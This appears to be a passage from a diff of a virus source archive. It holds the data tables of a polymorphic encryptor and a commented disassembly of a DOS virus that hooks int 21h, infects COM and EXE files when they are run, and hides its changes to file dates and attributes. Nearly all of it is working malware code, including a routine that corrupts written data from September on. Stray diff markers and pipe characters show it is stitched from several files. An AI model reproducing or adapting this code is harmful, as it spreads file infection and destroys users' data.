index_tab_c: db 0,0,0,7,0,0,4,5 ;Same As Above
|
||||
; SBB ADC XOR XOR ADD SUB
|
||||
enc_table: db 19, 11, 31, 31, 01, 29 ;The Decryptor Opcodes..
|
||||
|
||||
; AND OR TEST
|
||||
zero_test_a: db 21, 09,85
|
||||
|
||||
; SUB ;Opcodes to Modify the Key
|
||||
modify_table: db 0e8 ;Register
|
||||
; ADD XOR OR ;Opcode to get A value
|
||||
value_from_0: db 0c0,0f0,0c8 ;from 0.
|
||||
|
||||
loop_start dw 0 ;Postion for LOOP to Jump to..
|
||||
|
||||
index_num dw 0
|
||||
index_off db 0 ;OFFSET of INDEX reference (i.e: [SI+XX]).
|
||||
index_loc dw 0 ;location in ES of index reference set
|
||||
index_sub db 0 ;Was index_reg set using 0 the sub -value?
|
||||
|
||||
index_reg db 0 ;Table of Used Registers..
|
||||
count_reg db 0 ;used in GET_UNUSED_REG
|
||||
key_reg db 0
|
||||
index_set db 0
|
||||
|
||||
tce_flags dw 0 ;Engines Flags
|
||||
tce_delta dw 0 ;Delta Offset
|
||||
tce_begin dw 0 ;Beginning
|
||||
c_length dw 0
|
||||
end_tce:
|
||||
|
|
@ -0,0 +1,826 @@
|
|||
seg_a segment byte public
|
||||
assume cs:seg_a, ds:seg_a
|
||||
|
||||
org 100h
|
||||
|
||||
start: mov ax,es ;0100 8C C0
|
||||
add word ptr cs:[d_010C+2],ax ;segment relocation ;0102 2E: 01 06 010E
|
||||
jmp dword ptr cs:[d_010C] ;jump into virus code ;0107 2E: FF 2E 010C
|
||||
|
||||
d_010C dw 0000,0138h ;dword=entry into virus ;010C 0000 0138
|
||||
|
||||
;<- duplicated code (aligning to 20h bytes)
|
||||
db 0B8h,008h,000h,08Eh,0C0h,08Bh,00Eh,041h ;0110 B8 08 00 8E C0 8B 0E 41
|
||||
db 003h,0BAh,028h,000h,02Eh,08Bh,01Eh,09Bh ;0118 03 BA 28 00 2E 8B 1E 9B
|
||||
|
||||
;..............................................................
|
||||
; victim code
|
||||
;..............................................................
|
||||
org 1380h
|
||||
|
||||
|
||||
;============================================================================
|
||||
; Segment aligned virus segment begin
|
||||
;----------------------------------------------------------------------------
|
||||
|
||||
;================================================================
|
||||
; COM virus Entry
|
||||
; (this code is present only in case *.COM infection)
|
||||
;----------------------------------------------------------------
|
||||
l_0000: push ds ;1380 1E
|
||||
push cs ;1381 0E
|
||||
pop ds ;1382 1F
|
||||
lea si,cs:[4F7h] ;d_1877 = saved bytes ;1383 8D 36 04F7
|
||||
mov di,100h ;1387.BF 0100
|
||||
mov cx,20h ;138A B9 0020
|
||||
rep movsb ;restore victim bytes ;138D F3/ A4
|
||||
|
||||
mov byte ptr cs:[349h],0FFh ;d_16C9 (0FFh = COM) ;138F 2E: C6 06 0349 FF
|
||||
nop ;1395 90
|
||||
pop ds ;1396 1F
|
||||
lea ax,cs:[54Fh] ;l_18CF ;1397 8D 06 054F
|
||||
jmp ax ;139B FF E0
|
||||
|
||||
;<--- duplicated fields d_033F - d_0347
|
||||
dw 0020 ;139D 20 00
|
||||
dw 05EAh ;139F EA 05
|
||||
dw 0Bh ;13A1 0B 00
|
||||
dw 28h ;13A3 28 00
|
||||
dw 200h ;13A5 00 02
|
||||
db 0 ;13A7 00
|
||||
|
||||
;===========================================================================
|
||||
; Begin of file type independent virus code
|
||||
;---------------------------------------------------------------------------
|
||||
|
||||
;================================================================
|
||||
; Get/Set victim attribute
|
||||
;----------------------------------------------------------------
|
||||
s_13A8 proc near
|
||||
mov dx,offset ds:[57Fh] ;file name ;13A8.BA 057F
|
||||
mov ah,43h ;get/set file attrb ;13AB B4 43
|
||||
int 21h ;13AD CD 21
|
||||
retn ;13AF C3
|
||||
s_13A8 endp
|
||||
|
||||
;================================================================
|
||||
; Move file ptr to EOF
|
||||
;----------------------------------------------------------------
|
||||
s_13B0 proc near
|
||||
xor cx,cx ;13B0 33 C9
|
||||
xor dx,dx ;13B2 33 D2
|
||||
mov ax,4202h ;move file ptr EOF+offset ;13B4 B8 4202
|
||||
mov bx,cs:[9Bh] ;l_141B = file handle ;13B7 2E: 8B 1E 009B
|
||||
int 21h ;13BC CD 21
|
||||
retn ;13BE C3
|
||||
s_13B0 endp
|
||||
|
||||
|
||||
;================================================================
|
||||
; Read 32 bytes into buffer
|
||||
;----------------------------------------------------------------
|
||||
s_13BF proc near
|
||||
mov cx,20h ;13BF B9 0020
|
||||
mov dx,4F7h ;l_1877-sav victim bytes;13C2.BA 04F7
|
||||
mov bx,cs:[9Bh] ;l_141B = file handle ;13C5 2E: 8B 1E 009B
|
||||
mov ah,3Fh ;read file ;13CA B4 3F
|
||||
int 21h ;13CC CD 21
|
||||
mov cx,ax ;bytes read ;13CE 8B C8
|
||||
retn ;13D0 C3
|
||||
s_13BF endp
|
||||
|
||||
;================================================================
|
||||
; Write 32 B into file
|
||||
;----------------------------------------------------------------
|
||||
s_13D1 proc near
|
||||
mov ax,8 ;switch off destruction ;13D1 B8 0008
|
||||
mov es,ax ;13D4 8E C0
|
||||
mov cx,20h ;13D6 B9 0020
|
||||
mov dx,offset ds:[4F7h] ;l_1877 - saved bytes ;13D9.BA 04F7
|
||||
mov bx,cs:[9Bh] ;l_141B = file handle ;13DC 2E: 8B 1E 009B
|
||||
mov ah,40h ;write file cx=bytes ;13E1 B4 40
|
||||
int 21h ;13E3 CD 21
|
||||
mov cx,ax ;13E5 8B C8
|
||||
retn ;13E7 C3
|
||||
s_13D1 endp
|
||||
|
||||
;================================================================
|
||||
; Calculate virus length
|
||||
;----------------------------------------------------------------
|
||||
s_13E8 proc near
|
||||
mov ax,612h ;virus code length ;13E8 B8 0612
|
||||
mov dx,28h ;file type depended code;13EB BA 0028
|
||||
sub ax,dx ;13EE 2B C2
|
||||
mov ds:[341h],ax ;l_16C1 const vcode len ;13F0 A3 0341
|
||||
retn ;13F3 C3
|
||||
s_13E8 endp
|
||||
|
||||
;================================================================
|
||||
; Get/Set file daye & time
|
||||
;----------------------------------------------------------------
|
||||
s_13F4 proc near
|
||||
mov bx,ds:[9Bh] ;l_141B = file handle ;13F4 8B 1E 009B
|
||||
mov ah,57h ;get/set file date & time ;13F8 B4 57
|
||||
int 21h ;13FA CD 21
|
||||
retn ;13FC C3
|
||||
s_13F4 endp
|
||||
|
||||
;================================================================
|
||||
; Contamine File - master routine
|
||||
;----------------------------------------------------------------
|
||||
s_13FD proc near
|
||||
mov byte ptr ds:[349h],0 ;d_16C9 (000h = EXE) ;13FD C6 06 0349 00
|
||||
nop ;1402 90
|
||||
mov al,0 ;1403 B0 00
|
||||
call s_13A8 ;Get victim attribute ;1405 E8 FFA0
|
||||
jc l_146A ;-> EXIT ;1408 72 60
|
||||
mov ds:[33Fh],cx ;l_16BF oryg. file attr ;140A 89 0E 033F
|
||||
mov cx,20h ;140E B9 0020
|
||||
mov al,1 ;1411 B0 01
|
||||
call s_13A8 ;Set victim attribute ;1413 E8 FF92
|
||||
jc l_146A ;-> EXIT ;1416 72 52
|
||||
jmp short l_1421 ;1418 EB 07
|
||||
nop ;141A 90
|
||||
|
||||
d_009B dw 0005h ;file handle ;141B 05 00
|
||||
d_009D dw 0400h ;141D 00 04
|
||||
d_009F dw 057Fh ;filepath address ;141F 7F 05
|
||||
|
||||
l_1421: mov word ptr cs:[9Fh],057Fh ;l_141F := offset l_18FF;1421 2E C7 06 9F 00 7F 05
|
||||
mov dx,ds:[9Fh] ;l_141F - file name ;1428 8B 16 009F
|
||||
mov ax,400h ;142C B8 0400
|
||||
mov ds:[9Dh],ax ;l_141D ;142F A3 009D
|
||||
mov al,2 ;1432 B0 02
|
||||
mov ah,3Dh ;open file, al=mode ;1434 B4 3D
|
||||
int 21h ;1436 CD 21
|
||||
mov word ptr ds:[9Bh],0FFFFh ;l_141B = file handle ;1438 C7 06 009B FFFF
|
||||
jc l_1443 ;143E 72 03
|
||||
mov ds:[9Bh],ax ;l_141B = file handle ;1440 A3 009B
|
||||
l_1443: mov ax,ds:[9Bh] ;l_141B = file handle ;1443 A1 009B
|
||||
cmp ax,0FFFFh ;1446 3D FFFF
|
||||
je l_146A ;-> EXIT, open file err ;1449 74 1F
|
||||
mov al,0 ;144B B0 00
|
||||
call s_13F4 ;Get file daye & time ;144D E8 FFA4
|
||||
jc l_148F ;-> err, close & exit ;1450 72 3D
|
||||
mov ds:[0E8h],dx ;l_1468 = date ;1452 89 16 00E8
|
||||
mov ds:[0EDh],cx ;l_146D = time ;1456 89 0E 00ED
|
||||
call s_13BF ;Read 32 B into buffer ;145A E8 FF62
|
||||
mov ax,word ptr ds:[4F7h] ;l_1877 first file word ;145D A1 04F7
|
||||
cmp ax,5A4Dh ;'MZ' ? ;1460 3D 5A4D
|
||||
je l_146F ;-> yes, EXE ;1463 74 0A
|
||||
jmp l_1616 ;-> no, COM ;1465 E9 01AE
|
||||
|
||||
d_00E8 dw 0EF8h ;victim date ;1468 F8 0E
|
||||
|
||||
l_146A: jmp l_15C6 ;146A E9 0159
|
||||
|
||||
d_00ED dw 0001h ;victim time ;146D 01 00
|
||||
|
||||
;================================================================
|
||||
; EXE file contamination
|
||||
;----------------------------------------------------------------
|
||||
l_146F: mov ax,word ptr ds:[509h] ;+12h = negative sum ;146F A1 0509
|
||||
neg ax ;1472 F7 D8
|
||||
cmp ax,word ptr ds:[4F9h] ;+2 = last page bytes ;1474 3B 06 04F9
|
||||
je l_148F ;-> allready infected ;1478 74 15
|
||||
mov ax,word ptr ds:[4FBh] ;+4 = pages in file ;147A A1 04FB
|
||||
cmp ax,3 ;147D 3D 0003
|
||||
jb l_148F ;-> file to small ;1480 72 0D
|
||||
mov ax,word ptr ds:[4FFh] ;+8 = size of hdr (para);1482 A1 04FF
|
||||
mov cl,4 ;1485 B1 04
|
||||
shl ax,cl ;1487 D3 E0
|
||||
mov ds:[347h],ax ;l_16C7 = size of header;1489 A3 0347
|
||||
jmp short l_1492 ;148C EB 04
|
||||
nop ;148E 90
|
||||
|
||||
l_148F: jmp l_15A8 ;148F E9 0116
|
||||
|
||||
l_1492: mov ax,word ptr ds:[50Bh] ;+14h = IP ;1492 A1 050B
|
||||
mov word ptr ds:[5B4h],ax ;l_1934 ;1495 A3 05B4
|
||||
mov word ptr ds:[50Bh],28h ;new IP value (l_13A8) ;1498 C7 06 050B 0028
|
||||
call s_13B0 ;Move file ptr to EOF ;149E E8 FF0F
|
||||
push ax ;14A1 50
|
||||
push dx ;14A2 52
|
||||
sub ax,ds:[347h] ;l_16C7=size of header ;14A3 2B 06 0347
|
||||
sbb dx,0 ;14A7 83 DA 00
|
||||
mov word ptr ds:[439h],ax ;l_17B9 ;14AA A3 0439
|
||||
mov word ptr ds:[437h],dx ;l_17B7 ;14AD 89 16 0437
|
||||
cmp dx,0 ;14B1 83 FA 00
|
||||
ja l_14D3 ;-> more then 64KB ;14B4 77 1D
|
||||
cmp ax,word ptr ds:[50Bh] ;+14h = IP ;14B6 3B 06 050B
|
||||
ja l_14D3 ;-> more then 28h length;14BA 77 17
|
||||
|
||||
;<- EXE code length =< 28h
|
||||
mov word ptr ds:[345h],0 ;l_16C5 ;14BC C7 06 0345 0000
|
||||
mov bx,word ptr ds:[50Bh] ;14C2 8B 1E 050B
|
||||
sub bx,ax ;28h - file length ;14C6 2B D8
|
||||
mov ds:[343h],bx ;l_16C3 - aligning bytes;14C8 89 1E 0343
|
||||
mov ds:[513h],bx ;+1Ch = ? ;14CC 89 1E 0513
|
||||
jmp short l_1511 ;14D0 EB 3F
|
||||
nop ;14D2 90
|
||||
|
||||
l_14D3: sub ax,word ptr ds:[50Bh] ;+14h = IP=28h ;14D3 2B 06 050B
|
||||
sbb dx,0 ;14D7 83 DA 00
|
||||
mov ds:[345h],ax ;d_16C5 ;14DA A3 0345
|
||||
and ax,0Fh ;14DD 25 000F
|
||||
cmp ax,0 ;14E0 3D 0000
|
||||
jne l_14F9 ;-> need aligment ;14E3 75 14
|
||||
|
||||
mov word ptr ds:[343h],0 ;d_16C3 - aligning bytes;14E5 C7 06 0343 0000
|
||||
mov ax,ds:[345h] ;d_16C5 ;14EB A1 0345
|
||||
mov cx,10h ;14EE B9 0010
|
||||
div cx ;14F1 F7 F1
|
||||
mov ds:[345h],ax ;d_16C5 - segment of vir;14F3 A3 0345
|
||||
jmp short l_1511 ;14F6 EB 19
|
||||
db 90h ;14F8 90
|
||||
|
||||
;<---- need alignment
|
||||
l_14F9: mov word ptr ds:[343h],10h ;d_16C3 - aligning bytes;14F9 C7 06 0343 0010
|
||||
sub ds:[343h],ax ;d_16C3 - aligning bytes;14FF 29 06 0343
|
||||
mov ax,ds:[345h] ;d_16C5 ;1503 A1 0345
|
||||
mov cx,10h ;1506 B9 0010
|
||||
div cx ;1509 F7 F1
|
||||
add ax,1 ;+ alignment paragraph ;150B 05 0001
|
||||
mov ds:[345h],ax ;d_16C5 - segment of vir;150E A3 0345
|
||||
|
||||
l_1511: mov ax,word ptr ds:[50Dh] ;+ 16h = CS ;1511 A1 050D
|
||||
mov word ptr ds:[5B6h],ax ;d_1936 - victim CS ;1514 A3 05B6
|
||||
mov ax,ds:[345h] ;d_16C5 ;1517 A1 0345
|
||||
mov word ptr ds:[50Dh],ax ;+ 16h = CS ;151A A3 050D
|
||||
push ax ;151D 50
|
||||
mov ax,word ptr ds:[505h] ;+ 0Eh = SS ;151E A1 0505
|
||||
mov word ptr ds:[5A1h],ax ;d_1921 - victim SS ;1521 A3 05A1
|
||||
pop ax ;1524 58
|
||||
mov word ptr ds:[505h],ax ;+ 0Eh = virus SS ;1525 A3 0505
|
||||
mov ax,word ptr ds:[507h] ;+ 10h = SP ;1528 A1 0507
|
||||
mov word ptr ds:[5A3h],ax ;d_1923 victim SP ;152B A3 05A3
|
||||
lea ax,cs:[612h] ;End of virus ;152E 8D 06 0612
|
||||
add ax,1Eh ;virus stack ;1532 05 001E
|
||||
add ax,ds:[343h] ;d_16C3 - aligning bytes;1535 03 06 0343
|
||||
mov word ptr ds:[507h],ax ;virus SP ;1539 A3 0507
|
||||
call s_13E8 ;Calculate virus length ;153C E8 FEA9
|
||||
pop dx ;<- victim EOF ;153F 5A
|
||||
pop ax ;1540 58
|
||||
add ax,ds:[341h] ;l_16C1 const vcode len ;1541 03 06 0341
|
||||
adc dx,0 ;1545 83 D2 00
|
||||
add ax,ds:[343h] ;d_16C3 - aligning bytes;1548 03 06 0343
|
||||
adc dx,0 ;154C 83 D2 00
|
||||
mov cx,200h ;page length ;154F B9 0200
|
||||
div cx ;1552 F7 F1
|
||||
cmp dx,0 ;1554 83 FA 00
|
||||
je l_155A ;1557 74 01
|
||||
inc ax ;1559 40
|
||||
l_155A: mov word ptr ds:[4FBh],ax ;+4 - file len in pages ;155A A3 04FB
|
||||
mov word ptr ds:[4F9h],dx ;+2 - last page length ;155D 89 16 04F9
|
||||
neg dx ;1561 F7 DA
|
||||
mov word ptr ds:[509h],dx ;+12h = negative sum ;1563 89 16 0509
|
||||
mov cx,54Fh ;offset l_18CF-EXE entry;1567 B9 054F
|
||||
mov word ptr ds:[50Bh],cx ;+14h - virus IP ;156A 89 0E 050B
|
||||
cmp word ptr ds:[343h],3 ;d_16C3 - aligning bytes;156E 83 3E 0343 03
|
||||
jb l_1580 ;1573 72 0B
|
||||
|
||||
;<- file begins with jump
|
||||
mov cx,28h ;1575 B9 0028
|
||||
sub cx,ds:[343h] ;d_16C3 - aligning bytes;1578 2B 0E 0343
|
||||
mov word ptr ds:[50Bh],cx ;157C 89 0E 050B
|
||||
|
||||
l_1580: call s_15DF ;Set file pointer to BOF;1580 E8 005C
|
||||
call s_13D1 ;Write 32 B into file ;1583 E8 FE4B
|
||||
jc l_15A8 ;-> error, EXIT ;1586 72 20
|
||||
mov cx,ds:[343h] ;d_16C3 - aligning bytes;1588 8B 0E 0343
|
||||
sub cx,3 ;jmp instruction length ;158C 83 E9 03
|
||||
mov ax,54Fh ;offset l_18CF=EXE entry;158F B8 054F
|
||||
mov bx,28h ;beginning of code ;1592 BB 0028
|
||||
sub ax,bx ;jmp distance ;1595 2B C3
|
||||
add cx,ax ;aligning bytes ;1597 03 C8
|
||||
mov word ptr ds:[54Ch],cx ;l_18CC = jump distance ;1599 89 0E 054C
|
||||
call s_13B0 ;Move file ptr to EOF ;159D E8 FE10
|
||||
call s_15C7 ;Align EOF to paragraphs;15A0 E8 0024
|
||||
jc l_15A8 ;-> error, EXIT ;15A3 72 03
|
||||
call s_15FE ;Write const part of vir;15A5 E8 0056
|
||||
|
||||
;================================================================
|
||||
; End of contamination (common to EXE & COM)
|
||||
;----------------------------------------------------------------
|
||||
l_15A8: mov al,1 ;to set ;15A8 B0 01
|
||||
mov dx,ds:ds:[0E8h] ;d_1468 victim date ;15AA 8B 16 00E8
|
||||
mov cx,ds:ds:[0EDh] ;d_146D victim time ;15AE 8B 0E 00ED
|
||||
call s_13F4 ;Set file daye & time ;15B2 E8 FE3F
|
||||
|
||||
mov bx,ds:[9Bh] ;l_141B = file handle ;15B5 8B 1E 009B
|
||||
mov ah,3Eh ;close file ;15B9 B4 3E
|
||||
int 21h ;15BB CD 21
|
||||
|
||||
mov al,1 ;to set ;15BD B0 01
|
||||
mov cx,ds:[33Fh] ;l_16BF oryg. file attr ;15BF 8B 0E 033F
|
||||
call s_13A8 ;Set victim attribute ;15C3 E8 FDE2
|
||||
|
||||
l_15C6: retn ;15C6 C3
|
||||
|
||||
;================================================================
|
||||
; Align end of file to paragraphs
|
||||
;----------------------------------------------------------------
|
||||
s_15C7: mov ax,8 ;to switch off virus ;15C7 B8 0008
|
||||
mov es,ax ;15CA 8E C0
|
||||
mov cx,ds:[343h] ;l_16C3 - aligning bytes;15CC 8B 0E 0343
|
||||
mov dx,54Bh ;offset d_18CB ;15D0.BA 054B
|
||||
mov bx,cs:[9Bh] ;l_141B = file handle ;15D3 2E: 8B 1E 009B
|
||||
mov ah,40h ;write file ;15D8 B4 40
|
||||
int 21h ;15DA CD 21
|
||||
mov cx,ax ;15DC 8B C8
|
||||
retn ;15DE C3
|
||||
|
||||
;================================================================
|
||||
; Set file pointer to BOF
|
||||
;----------------------------------------------------------------
|
||||
s_15DF: xor cx,cx ;15DF 33 C9
|
||||
xor dx,dx ;15E1 33 D2
|
||||
mov ax,4200h ;move file ptr, cx,dx=offset ;15E3 B8 4200
|
||||
mov bx,cs:[9Bh] ;l_141B = file handle ;15E6 2E: 8B 1E 009B
|
||||
int 21h ;15EB CD 21
|
||||
retn ;15ED C3
|
||||
|
||||
;================================================================
|
||||
; COM virus start code pattern
|
||||
;----------------------------------------------------------------
|
||||
d_026E: mov ax,es ;15EE 8C C0
|
||||
add word ptr cs:[010Ch+2],ax ;15F0 2E: 01 06 010E
|
||||
jmp dword ptr cs:[010Ch] ;15F5 2E: FF 2E 010C
|
||||
d_027A dw 0 ;15FA 00 00
|
||||
d_027C dw 0138h ;15FC 38 01
|
||||
|
||||
;================================================================
|
||||
; Write constant part of virus
|
||||
;----------------------------------------------------------------
|
||||
s_15FE: mov ax,8 ;switch off virus ;15FE B8 0008
|
||||
mov es,ax ;1601 8E C0
|
||||
mov cx,ds:[341h] ;l_16C1 const.code leng.;1603 8B 0E 0341
|
||||
mov dx,28h ;offset l_13A8 - vircode;1607.BA 0028
|
||||
mov bx,cs:[9Bh] ;l_141B = file handle ;160A 2E: 8B 1E 009B
|
||||
mov ah,40h ;write file ;160F B4 40
|
||||
int 21h ;1611 CD 21
|
||||
mov cx,ax ;1613 8B C8
|
||||
retn ;1615 C3
|
||||
|
||||
;================================================================
|
||||
; COM victim contamination
|
||||
;----------------------------------------------------------------
|
||||
l_1616: cmp word ptr ds:[4F9h],12Eh ;BOF+2 ;1616 81 3E 04F9 012E
|
||||
je l_15A8 ;-> contamined, EXIT ;161C 74 8A
|
||||
call s_13B0 ;Move file ptr to EOF ;161E E8 FD8F
|
||||
cmp ax,3E8h ;1000 byte file length ;1621 3D 03E8
|
||||
jb l_169F ;-> bellow, EXIT ;1624 72 79
|
||||
add ax,100h ;add PSP ;1626 05 0100
|
||||
adc dx,0 ;1629 83 D2 00
|
||||
push ax ;162C 50
|
||||
and ax,0Fh ;162D 25 000F
|
||||
mov word ptr ds:[343h],0 ;l_16C3 aligning bytes ;1630 C7 06 0343 0000
|
||||
cmp ax,0 ;1636 3D 0000
|
||||
je l_1645 ;-> para aligned file ;1639 74 0A
|
||||
mov word ptr ds:[343h],10h ;l_16C3 - aligning bytes;163B C7 06 0343 0010
|
||||
sub ds:[343h],ax ;l_16C3 - aligning bytes;1641 29 06 0343
|
||||
l_1645: pop ax ;1645 58
|
||||
add ax,ds:[343h] ;l_16C3 aligning bytes ;1646 03 06 0343
|
||||
adc dx,0 ;164A 83 D2 00
|
||||
cmp dx,0 ;164D 83 FA 00
|
||||
ja l_169F ;-> file to big, EXIT ;1650 77 4D
|
||||
mov cl,4 ;1652 B1 04
|
||||
shr ax,cl ;bytes 2 paragraphs ;1654 D3 E8
|
||||
cmp word ptr ds:[343h],0 ;l_16C3 - aligning bytes;1656 83 3E 0343 00
|
||||
mov ds:[27Ch],ax ;l_15FC virus segment ;165B A3 027C
|
||||
mov word ptr ds:[27Ah],0 ;l_15FA virus entry ;165E C7 06 027A 0000
|
||||
call s_15DF ;Set file pointer to BOF;1664 E8 FF78
|
||||
mov ax,8 ;to switch off virus ;1667 B8 0008
|
||||
mov es,ax ;166A 8E C0
|
||||
mov cx,20h ;bytes to write ;166C B9 0020
|
||||
mov dx,26Eh ;offset l_15EE ;166F.BA 026E
|
||||
mov bx,cs:[9Bh] ;l_141B = file handle ;1672 2E: 8B 1E 009B
|
||||
mov ah,40h ;write file ;1677 B4 40
|
||||
int 21h ;1679 CD 21
|
||||
mov cx,ax ;bytes written ;167B 8B C8
|
||||
call s_13B0 ;Move file ptr to EOF ;167D E8 FD30
|
||||
call s_15C7 ;write aligning bytes ;1680 E8 FF44
|
||||
|
||||
mov ax,8 ;switch off virus ;1683 B8 0008
|
||||
mov es,ax ;1686 8E C0
|
||||
mov cx,28h ;40 bytes ;1688 B9 0028
|
||||
mov dx,322h ;offset l_16A2 ;168B .BA 0322
|
||||
mov bx,cs:[9Bh] ;l_141B = file handle ;168E 2E: 8B 1E 009B
|
||||
mov ah,40h ;write file ;1693 B4 40
|
||||
int 21h ;1695 CD 21
|
||||
mov cx,ax ;bytes written ;1697 8B C8
|
||||
call s_13E8 ;Calculate virus length ;1699 E8 FD4C
|
||||
call s_15FE ;Write const part of vir;169C E8 FF5F
|
||||
l_169F: jmp l_15A8 ;close files, EXIT ;169F E9 FF06
|
||||
s_13FD endp
|
||||
|
||||
;<-- COM type virus begin pattern
|
||||
d_0322: push ds ;16A2 1E
|
||||
push cs ;16A3 0E
|
||||
pop ds ;16A4 1F
|
||||
lea si,cs:[4F7h] ;16A5 8D 36 04F7
|
||||
mov di,0100h ;16A9.BF 0100
|
||||
mov cx,20h ;16AC B9 0020
|
||||
rep movsb ;16AF F3/ A4
|
||||
mov byte ptr cs:[349h],0FFh ;d_16C9 (0FFh = COM) ;16B1 2E: C6 06 0349 FF
|
||||
nop ;16B7 90
|
||||
pop ds ;16B8 1F
|
||||
lea ax,cs:[54Fh] ;16B9 8D 06 054F
|
||||
jmp ax ;16BD FF E0
|
||||
|
||||
;------ work area
|
||||
d_033F dw 0020h ;oryg. file attr ;16BF 20 00
|
||||
d_0341 dw 05EAh ;const virus code length;16C1 EA 05
|
||||
d_0343 dw 0Bh ;aligning bytes ;16C3 0B 00
|
||||
d_0345 dw 28h ;16C5 28 00
|
||||
d_0347 dw 200h ;size of header ;16C7 00 02
|
||||
d_0349 db 0 ;0=EXE, 0FFh=COM ;16C9 00
|
||||
|
||||
;================================================================
|
||||
; init registers
|
||||
;----------------------------------------------------------------
|
||||
s_16CA proc near
|
||||
xor si,si ;16CA 33 F6
|
||||
xor di,di ;16CC 33 FF
|
||||
xor ax,ax ;16CE 33 C0
|
||||
xor dx,dx ;16D0 33 D2
|
||||
xor bp,bp ;16D2 33 ED
|
||||
retn ;16D4 C3
|
||||
s_16CA endp
|
||||
|
||||
;================================================================
|
||||
; int 24h handling routine (infection time active only)
|
||||
;----------------------------------------------------------------
|
||||
l_16D5: cmp di,0 ;16D5 83 FF 00
|
||||
jne l_16DD ;16D8 75 03
|
||||
mov al,3 ;ignore ;16DA B0 03
|
||||
iret ;16DC CF
|
||||
|
||||
l_16DD: jmp dword ptr cs:[362h] ;L_16E2 = old int 24h ;16DD 2E: FF 2E 0362
|
||||
|
||||
d_0362 dw 0556h,0DF0h ;16E2 56 05 F0 0D
|
||||
|
||||
;================================================================
|
||||
; Get int 24h
|
||||
;----------------------------------------------------------------
|
||||
s_16E6 proc near
|
||||
cli ; Disable interrupts ;16E6 FA
|
||||
xor bx,bx ;16E7 33 DB
|
||||
mov es,bx ;16E9 8E C3
|
||||
mov bx,es:[90h] ;int 24h offset ;16EB 26: 8B 1E 0090
|
||||
mov word ptr cs:[362h],bx ;l_16E2 ;16F0 2E: 89 1E 0362
|
||||
mov bx,es:[92h] ;int 24h segment ;16F5 26: 8B 1E 0092
|
||||
mov word ptr cs:[362h+2],bx ;L_16E2+2 ;16FA 2E: 89 1E 0364
|
||||
mov word ptr es:[90h],355h ;offset l_16D5 ;16FF 26: C7 06 0090 0355
|
||||
mov es:[92h],ax ;int 24h segment := CS ;1706 26: A3 0092
|
||||
sti ;170A FB
|
||||
retn ;170B C3
|
||||
s_16E6 endp
|
||||
|
||||
|
||||
;================================================================
|
||||
; Restore int 24h vector
|
||||
;----------------------------------------------------------------
|
||||
s_170C proc near
|
||||
cli ;170C FA
|
||||
xor bx,bx ;170D 33 DB
|
||||
mov es,bx ;170F 8E C3
|
||||
mov bx,word ptr cs:[362h] ;1711 2E: 8B 1E 0362
|
||||
mov es:[90h],bx ;1716 26: 89 1E 0090
|
||||
mov bx,word ptr cs:[362h+2] ;171B 2E: 8B 1E 0364
|
||||
mov es:[92h],bx ;1720 26: 89 1E 0092
|
||||
sti ;1725 FB
|
||||
retn ;1726 C3
|
||||
s_170C endp
|
||||
|
||||
;===============================================================
|
||||
; write handle service routine (destruction routine)
|
||||
;---------------------------------------------------------------
|
||||
s_1727 proc near
|
||||
push ax ;1727 50
|
||||
push bx ;1728 53
|
||||
push cx ;1729 51
|
||||
push dx ;172A 52
|
||||
push es ;172B 06
|
||||
push ds ;172C 1E
|
||||
push si ;172D 56
|
||||
push di ;172E 57
|
||||
mov ax,es ;172F 8C C0
|
||||
cmp ax,8 ;1731 3D 0008
|
||||
je l_1750 ;-> virus contamination ;1734 74 1A
|
||||
cmp bx,4 ;1736 83 FB 04
|
||||
jb l_1750 ;-> BIOS ;1739 72 15
|
||||
mov ah,2Ah ;get date, cx=year, dx=mon/day ;173B B4 2A
|
||||
int 21h ;173D CD 21
|
||||
cmp dh,9 ;september ? ;173F 80 FE 09
|
||||
jb l_1750 ;-> bellow ;1742 72 0C
|
||||
pop di ;1744 5F
|
||||
pop si ;1745 5E
|
||||
pop ds ;1746 1F
|
||||
pop es ;1747 07
|
||||
pop dx ;1748 5A
|
||||
pop cx ;1749 59
|
||||
pop bx ;174A 5B
|
||||
pop ax ;174B 58
|
||||
add dx,0Ah ;shift buffer address ;174C 83 C2 0A
|
||||
retn ;174F C3
|
||||
|
||||
l_1750: pop di ;1750 5F
|
||||
pop si ;1751 5E
|
||||
pop ds ;1752 1F
|
||||
pop es ;1753 07
|
||||
pop dx ;1754 5A
|
||||
pop cx ;1755 59
|
||||
pop bx ;1756 5B
|
||||
pop ax ;1757 58
|
||||
retn ;1758 C3
|
||||
s_1727 endp
|
||||
|
||||
db 16 dup (0) ;not used ;1759 0010[00]
|
||||
|
||||
;================================================================
|
||||
; Load & Execute service routine
|
||||
;----------------------------------------------------------------
|
||||
s_1769 proc near
|
||||
push ax ;1769 50
|
||||
push bx ;176A 53
|
||||
push cx ;176B 51
|
||||
push dx ;176C 52
|
||||
push es ;176D 06
|
||||
push ds ;176E 1E
|
||||
push si ;176F 56
|
||||
push di ;1770 57
|
||||
mov si,dx ;file pathname ;1771 8B F2
|
||||
mov ax,cs ;1773 8C C8
|
||||
mov es,ax ;1775 8E C0
|
||||
mov di,offset ds:[57Fh] ;l_18FF - victim name ;1777.BF 057F
|
||||
mov cx,19h ;177A B9 0019
|
||||
rep movsb ;copy victim name ;177D F3/ A4
|
||||
call s_16E6 ;Get int 24h vector ;177F E8 FF64
|
||||
mov ds,ax ;ds:=cs ;1782 8E D8
|
||||
call s_13FD ;1784 E8 FC76
|
||||
call s_170C ;Restore int 24h vector ;1787 E8 FF82
|
||||
pop di ;178A 5F
|
||||
pop si ;178B 5E
|
||||
pop ds ;178C 1F
|
||||
pop es ;178D 07
|
||||
pop dx ;178E 5A
|
||||
pop cx ;178F 59
|
||||
pop bx ;1790 5B
|
||||
pop ax ;1791 58
|
||||
retn ;1792 C3
|
||||
s_1769 endp
|
||||
|
||||
;================================================================
|
||||
; New int 21h service routine
|
||||
;----------------------------------------------------------------
|
||||
;<---- 10 bytes to identify resident virus
|
||||
d_0413: pushf ;1793 9C
|
||||
cmp ah,40h ;write handle ? ;1794 80 FC 40
|
||||
jne l_179F ;-> no ;1797 75 06
|
||||
call s_1727 ;write handle service routine ;1799 E8 FF8B
|
||||
jmp short l_17A7 ;179C EB 09
|
||||
nop ;179E 90
|
||||
|
||||
l_179F: cmp ah,4Bh ;Load & Execute ? ;179F 80 FC 4B
|
||||
jne l_17A7 ;-> no ;17A2 75 03
|
||||
call s_1769 ;Load & Execute service routine ;17A4 E8 FFC2
|
||||
l_17A7: popf ;17A7 9D
|
||||
|
||||
;================================================================
|
||||
; Execute substituted code and jump into old int 21h service
|
||||
;----------------------------------------------------------------
|
||||
